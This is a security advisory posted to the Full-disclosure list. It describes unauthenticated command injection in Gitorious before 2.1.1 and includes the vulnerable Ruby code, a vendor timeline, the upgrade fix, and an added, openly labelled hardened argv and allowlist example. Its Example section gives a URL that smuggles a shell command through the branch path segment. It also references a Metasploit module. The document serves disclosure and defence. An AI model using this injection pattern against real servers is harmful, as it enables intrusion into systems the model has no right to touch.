[Full-disclosure] Advisory: Remote Command Execution in Gitorious
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] Advisory: Remote Command Execution in Gitorious
- From: joernchen of Phenoelit <joernchen@xxxxxxxxxxxx>
- Date: Fri, 27 Jan 2012 18:50:21 +0100
Hi,
FYI, see attached.
cheers,
joernchen
--
joernchen ~ Phenoelit
<joernchen@xxxxxxxxxxxx> ~ C776 3F67 7B95 03BF 5344
http://www.phenoelit.de ~ A46A 7199 8B7B 756A F5AC
Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 +--+->
[ Authors ]
joernchen <joernchen () phenoelit de>
Phenoelit Group (http://www.phenoelit.de)
[ Affected Products ]
Gitorious < 2.1.1 (http://gitorious.org)
[ Vendor communication ]
2012-01-16 Asking vendor for PGP key
2012-01-17 Getting PGP key from vendor
2012-01-17 Sending vulnerability details to vendor
2012-01-19 Vendor replies and sends link to patch [0]
2012-01-19 Asking if users will be informed
2012-01-20 Vendor states that they will create a patch and let the users know
2012-01-25 Asking for a timeline for the notification
2012-01-26 Vendor replies that patched branch is pushed and users are informed via a mailing list.
2012-01-27 Release of this advisory
[ Overview ]
Gitorious is a Git repository management software written in Ruby on Rails.
[ Description ]
Gitorious has been found vulnerable to unauthenticated remote command execution.
Root cause is in gitorious-mainline/lib/gitorious/git_shell.rb:

  def execute(command)
    Timeout.timeout(20) do
      `#{command}`   # the whole string is handed to /bin/sh, metacharacters included
    end
  rescue Timeout::Error
  end

called by app/controllers/api/graphs_controller.rb:

  def graph_log(repo, type, branch = nil)
    args = [repo.full_repository_path, "--decorate=full", "-100", type]
    args << desplat_path(branch) if branch   # branch comes straight from the URL
    git_shell.send(:graph_log, *args)
  end

where branch is user controlled via route:

  api.connect ':project_id/:repository_id/log/graph/*branch',
    :controller => 'graphs', :action => 'show'
[ Example ]
http://gitorious.site/project/repo/log/graph/`id>/tmp/command_exec`
For convenient use of this feature have a look at [1]
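The Description and Example above come down to one pattern: a URL segment is interpolated into a single shell string and run through backticks. The following is an added example, not code from the advisory or from Gitorious, contrasting that string-building shape with a hardened version. The exact command Gitorious built is not shown in the advisory, so vulnerable_command is an assumed stand-in; SAFE_REF, validate_branch!, git_graph_argv and run_argv are names introduced here, and the sample branch values are constructed (the malicious one has the same shape as the advisory's example).

```ruby
require "open3"
require "timeout"

# Constructed samples: the *branch segment as a wildcard route would deliver it.
MALICIOUS_BRANCH = "`id>/tmp/command_exec`"   # same shape as the advisory's example
BENIGN_BRANCH    = "feature/login"

# Vulnerable shape (assumed stand-in for the Gitorious < 2.1.1 command builder):
# user input becomes part of one string that is later given to a shell, so
# backticks, $(), ; and friends are interpreted as commands, not as a ref name.
# Returned, never executed here, so the reader can inspect what the shell would see.
def vulnerable_command(repo_path, branch)
  "git --git-dir=#{repo_path} log --decorate=full -100 #{branch}"
end

# Conservative allowlist for ref names (a subset of what git itself accepts).
# The leading character must be alphanumeric, which also blocks option
# injection such as a branch named "--output=...".
SAFE_REF = %r{\A[A-Za-z0-9][A-Za-z0-9._/-]*\z}

def validate_branch!(branch)
  ok = branch.match?(SAFE_REF) &&
       !branch.include?("..") &&
       !branch.end_with?("/", ".lock")
  raise ArgumentError, "invalid ref name: #{branch.inspect}" unless ok
  branch
end

# Hardened shape: build an argv array. Each element is exactly one argument
# to git; no shell is involved, so metacharacters cannot become commands.
def git_graph_argv(repo_path, branch)
  ["git", "--git-dir=#{repo_path}", "log", "--decorate=full", "-100",
   validate_branch!(branch)]
end

# Runs an argv array without a shell, keeping the original 20 s timeout idea.
# Returns [stdout, success?]; a Timeout::Error propagates to the caller.
def run_argv(argv, timeout: 20)
  Timeout.timeout(timeout) do
    out, status = Open3.capture2(*argv)
    [out, status.success?]
  end
end

if $PROGRAM_NAME == __FILE__
  puts "shell would see: #{vulnerable_command('/srv/git/repo.git', MALICIOUS_BRANCH)}"
  # With argv form even the payload is just an inert argument: echo prints it literally.
  out, _ok = run_argv(["echo", MALICIOUS_BRANCH])
  puts "argv form printed: #{out}"
  begin
    git_graph_argv("/srv/git/repo.git", MALICIOUS_BRANCH)
  rescue ArgumentError => e
    puts "rejected: #{e.message}"
  end
end
```

The two defences are independent and both worth having: the argv form removes the shell from the path entirely, and the ref-name allowlist stops the remaining class of problems (option injection, odd refs) before git ever sees the input. Gitorious' own fix is in the commit referenced at [0]; the code above does not claim to reproduce it.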
[ Solution ]
Update to version 2.1.1
[ References ]
[0] https://gitorious.org/gitorious/mainline/commit/647aed91a4dc72e88a27476948dfbacd5d0bf7ce
[1] http://metasploit.com/modules/exploit/multi/http/gitorious_graph
[ end of file ]